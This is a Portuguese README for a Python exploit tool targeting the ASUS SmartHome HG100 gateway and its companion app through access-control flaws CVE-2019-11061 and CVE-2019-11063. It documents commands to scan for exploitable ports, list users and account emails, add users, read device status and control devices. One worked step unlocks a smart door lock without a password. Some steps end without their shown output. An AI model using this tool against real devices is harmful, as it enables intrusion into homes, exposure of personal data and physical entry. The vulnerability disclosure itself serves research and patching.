
Exploit do ASUS SmartHome para CVE-2019-11061 e CVE-2019-11063
CVE-2019-11061 : Falha de controle de acesso no HG100
Produtos afetados : ASUS SmartHome Gateway HG100 Firmware versão < 4.00.09
CVE-2019-11063 : Falha de controle de acesso no aplicativo SmartHome
Produtos afetados : ASUS SmartHome Android APP versão < 3.0.45_190701
Se o atacante estiver na mesma rede interna que o HG100 ou um dispositivo móvel com o aplicativo complementar (android ou iPhone). O atacante pode enviar solicitações de controle para eles.
usage: exploit.py scan [-h] [-v] target_ip
scan exploitable port
positional arguments:
target_ip scan ip
optional arguments:
-h, --help show this help message and exit
-v show account email list
usage: exploit.py cmd [-h]
(-u | -l | -s device_id | -c device_id status | -a username)
[--user username] [--new-user username] [-v]
target
send command to target
positional arguments:
target <target-ip>:<port>
optional arguments:
-h, --help show this help message and exit
-u, --list-user list all user in device
-l, --list-device list all device status
-s device_id, --device-status device_id
list device status
-c device_id status, --device-control device_id status
control device status
-a username, --add-user username
add a user to device
--user username assign user for cmd
--new-user username create a new user for cmd
-v show account email list
$ ./exploit.py cmd https://10.42.50.166:8083 -l
Escanear porta explorável do dispositivo móvel (com o aplicativo complementar instalado para Android ou iPhone) :
P.S. A opção -v listará os usuários que foram adicionados ao HG100.
ou
Escanear porta explorável do HG100 :
Obtenha todos os usuários que foram adicionados ao HG100:

ou adicione um novo:
Nota: use https://10.42.50.166:8083 para o argumento "cmd".
Por exemplo:
$ ./exploit.py cmd https://10.42.50.166:8083 -u
Obtenha todas as informações dos dispositivos sob o SmartHome Gateway:
P.S. Se a opção --user não for definida, o primeiro usuário no HG100 será selecionado automaticamente. (Porque nenhuma senha é necessária)
Compare com o aplicativo:
Controle (destrave) o DoorLock.
P.S. o valor 1028 é obtido da opção -l (passo 3).
Resultado:
